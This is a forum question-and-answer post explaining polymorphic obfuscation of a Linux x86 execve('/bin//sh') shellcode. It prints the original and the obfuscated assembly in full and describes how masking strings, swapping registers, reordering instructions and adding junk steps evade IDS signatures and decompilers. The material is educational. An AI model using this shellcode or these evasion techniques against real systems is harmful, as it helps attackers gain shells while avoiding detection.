Explained polymorphic obfuscation using the difference within two asm codes
Here are two asm codes (copied from this forum polymorphic-shellcode):
orginal asm before obfuscation:
global _start
section .text
_start
xor eax,eax
push eax
push dword 0x68732f2f ; //sh
push dword 0x6e69622f ; /bin
mov ebx,esp
mov ecx,eax
mov edx,eax
mov al,0xb ; execve()
int 0x80
xor eax,eax
inc eax
int 0x80
revised asm after obfuscation:
global _start
section .text
_start:
xor edx, edx ;line 1
push edx ;line 2
mov eax, 0x563ED8B7 ;line 3
add eax, 0x12345678 ;line 4
push eax ;line 5
mov eax, 0xDEADC0DE ;line 6
sub eax, 0x70445EAF ;line 7
push eax ;line 8
push byte 0xb ;line 9
pop eax ;line 10
mov ecx, edx ;line 11
mov ebx, esp ;line 12
push byte 0x1 ;line 13
pop esi ;line 14
int 0x80 ;line 15
xchg esi, eax ;line 16
int 0x80 ;line 17
It makes four changes:
1. Mask the /bin/sh string by doing arithmetic operations instead of pushing the hex values into the stack directly.
Q1.1: I can understand line 3 to 8 (in revised asm). what means line 9? equals to "mov al,0xb" in original asm?
2. Use different registers than the original code where possible.
Q2.1: for example, line 1 and 2 (revised asm) refers to this?
Q2.2: i understand obfuscation as let IDS cannot match keywords, why change registers?
3. Reorder instructions. Don't initialize the registers in the same order before calling execve.
Q3.1: I do not understand this. Explain it using above two asm.
4. Introduce some unnecessary steps. eg: push byte 0x1; pop esi; xchg esi,eax instead of popping to eax after the first int 0x80 instruction is executed.
Q4.1: In the original asm, why there are two int 0x80? I have tried to delete the last 0x80, it still works. Q4.2: Is add unnecessary steps directly related to obfuscation??
Q5: why "pop eax" in line 10?
Q1.1: I can understand line 3 to 8 (in revised asm). what means line 9? equals to "mov al,0xb" in original asm?
Line 9 and 10 do push byte 0xb, pop eax
, which obviously translates to mov eax,0x0000000b
. Because x86 is little endian this fills al
with 0xb
(and the rest of the eax
register with zero's). So it's actually replacing the xor eax,eax
/ mov al,0xb
combination.
push 0xb -> mov [ss:esp],0x0000000b ; memory at SS:ESP = 0x0000000b
pop eax -> mov eax,[ss:esp] ; ergo eax = 0x0000000b
Q2.2: i understand obfuscation as let IDS cannot match keywords, why change registers?
Many compilers use registers in a more or less standard manner. An advanced program like IDA-pro (or an IDS) can use this knowledge to decompile the assembly back to readable source code, provided that it can deduce the exact compiler version used to create the program. By mixing up registers it makes it harder for a decompiler to translate the assembly code to higher level (pseudo) source code. The same goes for an IDS which uses known code snippets to deduce what actions a program performs.
Reorder instructions. Don't initialize the registers in the same order before calling execve. Q3.1: I do not understand this. Explain it using above two asm.
If you use system calls, it is relatively easy to deduce what actions an application is performing. Linux (for example) stores the call# in eax
and every call has specified parameters in predetermined registers. By making it difficult for an analysis program to determine the value of eax
it becomes unclear which system call is being executed. Without this knowledge the meaning of the other registers (read: parameters) cannot be known. If you fill non-used registers with nonsense values as well then things become even harder to interpret.
The obfuscater does not want you to know it is calling syscall #11 (execve). The only way to do this is to try to load eax
with 0xb
in a round-about manner. If we always load eax
last (or first), then it becomes easier to figure out what is going on. If we load eax
using 2 or more instructions, and we put lots of unrelated instructions in between, then it becomes harder to track the final value of eax
before the int 0x80
which performs the syscall.
Q4.1: In the original asm, why there are two int 0x80
? I have tried to delete the last 0x80, it still works. Q4.2: Is add unnecessary steps directly related to obfuscation??
No, previous syscall to (execve) loads 1
into eax upon successful return. Syscall #1 happens to be sys_exit
, which cleanly closes the program. When injecting the code into a program, the bytes after the inserted snippet are random garbage, we don't want to execute those and must thus exit the thread cleanly. The call to sys_exit
achieves this.
If you assemble this snippet as a stand-alone program, the assembler will append a sys_exit
call for you. This is why removing the last int 0x80
seems to make no difference.
Q5: why "pop eax" in line 10?
First a 0xb
is push
ed, then it is pop
ed into eax
, essentially performing a mov eax,0xb
.
上一篇: Google云端硬盘前端界面事件侦听器
下一篇: 使用两个asm代码中的差异来解释多态混淆